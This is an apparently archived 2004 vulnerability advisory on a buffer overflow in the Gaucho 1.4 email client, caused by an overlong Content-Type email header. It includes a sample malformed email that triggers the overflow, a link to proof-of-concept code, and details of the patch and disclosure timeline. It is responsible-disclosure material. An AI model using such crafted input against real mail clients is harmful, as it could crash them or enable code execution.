Twenty Year Anniversary

gaucho140.html

gaucho140.html
Posted Aug 26, 2004
Authored by Tan Chew Keong | Site security.org.sg

Gaucho version 1.4 Build 145 is vulnerable to a buffer overflow when receiving malformed emails from a POP3 server. This vulnerability is triggered if Gaucho receives from the POP3 server, a specially crafted email that has an abnormally long string in the Content-Type field of the email header. This string will overwrite EIP via SEH, and can be exploited to execute arbitrary code.

tags | advisory, overflow, arbitrary
MD5 | 3382c9b3cbaca0beaf6ed81da2bcec76

gaucho140.html

Change Mirror Download
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>SIG^2 G-TEC - Gaucho 1.4 Email Client has Buffer Overflow Vulnerability when Receiving Email Headers with Abnormally Long Content-Type Field</title>
<body>
<span class="headertext">SIG^2 Vulnerability Research Advisory</span>
<p/>
<span class="headertext"><h1>Gaucho 1.4 Email Client has Buffer Overflow Vulnerability when Receiving Email Headers with
Abnormally Long Content-Type Field</h1></span>
by Tan Chew Keong<br>
Release Date: 23 Aug 2004<br>
<p>
<span class="headertext">Summary</span><br>
<br>
<a href="http://homepage1.nifty.com/nakedsoft/">Gaucho</a>
is an Email client developed by NakedSoft for Microsoft Windows platforms. Gaucho supports SMTP, POP3 and
other email delivery protocols. Gaucho version 1.4 Build 145 is vulnerable to a buffer overflow when receiving
malformed emails from a POP3 server. This vulnerability is triggered if Gaucho receives from the POP3 server, a specially
crafted email that has an abnormally long string in the <b>Content-Type</b> field of the email header. This string will
overwrite EIP via SEH, and can be exploited to execute arbitrary code.
<p>&nbsp;<br>
<span class="headertext">Tested System</span><br>
<br>
Gaucho 1.4 Build 145 on English Win2K SP4
<p>&nbsp;<br>
<span class="headertext">Details</span><br>
<br>
Gaucho version 1.4 Build 145 is vulnerable to a buffer overflow when receiving malformed emails from a POP3 server.
This vulnerability is triggered if Gaucho receives from the POP3 server, a specially crafted email that has an abnormally
long string in the <b>Content-Type</b> field of the email header. This string will overwrite EIP via SEH,
and can be exploited to execute arbitrary code. A sample email that will trigger the overflow is shown
below.
<p>
<div class="codeBlk">
<code><pre>
Date: Mon, 09 Aug 2004 19:44:13 +0800
Subject: Testing
To: a@aaaaaa.xxx
From: XX <xx@xxxxxxxx.xxx.xx>
Message-ID: <GM109205179359A000.b76.xx@xxxxxxxx.xxx.xx>
MIME-Version: 1.0
Content-Type: <b><font color="#ff0000">AAAAAAAAAAAAA[approx. 280 chars]...</font></b>; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-Mailer: Gaucho Version 1.4.0 Build 145

Testing
.
</pre></code>
</div>
<p>
The following Ollydbg screen capture shows that the EIP was overwritten when an abnormally long string was
supplied with the Content-Type email header.
<p>&nbsp;<br>
<img src="gaucho140.jpg">
<p>&nbsp;<br>
<span class="headertext">POC Exploit</span><br>
<br>
Proof-of-concept code to validate this vulnerability can be downloaded <a href="gaucho140poc.cpp">here</a>.
<p>&nbsp;<br>
<span class="headertext">Patch</span><br>
<br>
Author has fixed the vulnerability in Version 1.4 <a href="http://homepage1.nifty.com/nakedsoft/Gaucho/Gaucho14.html">
Build 151</a>. Users are advised to upgrade to the fixed version.
<p>&nbsp;<br>
<span class="headertext">Disclosure Timeline</span><br>
<br>
09 Aug 04 - Vulnerability Discovered<br>
10 Aug 04 - Initial Vendor Notification (no reply)<br>
12 Aug 04 - Second Vendor Notification<br>
14 Aug 04 - Author replied with fixed version<br>
23 Aug 04 - Public Release<br>
<p>&nbsp;</p>
<span class="headertext">Contacts</span><br>
<br>
For further questions and enquries, email them to the following.
<p />
Overall-in-charge: <a href="mailto:%63%68%65%77%6b%65%6f%6e%67%40%73%65%63%75%72%69%74%79%2E%6F%72%67%2E%73%67">Tan Chew Keong</a>
<p />

<p>

<P><BR>
<span class="footnote">Updated: 23/8/2004</span><BR>
<A href="mailto:%77%65%62%6D%61%73%74%65%72%40%73%65%63%75%72%69%74%79%2E%6F%72%67%2E%73%67" class="smallblackText">webmaster@security.org.sg</A></P>
</body>
</html>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    26 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    2 Files
  • 7
    Oct 7th
    3 Files
  • 8
    Oct 8th
    23 Files
  • 9
    Oct 9th
    16 Files
  • 10
    Oct 10th
    15 Files
  • 11
    Oct 11th
    19 Files
  • 12
    Oct 12th
    16 Files
  • 13
    Oct 13th
    2 Files
  • 14
    Oct 14th
    2 Files
  • 15
    Oct 15th
    15 Files
  • 16
    Oct 16th
    20 Files
  • 17
    Oct 17th
    19 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close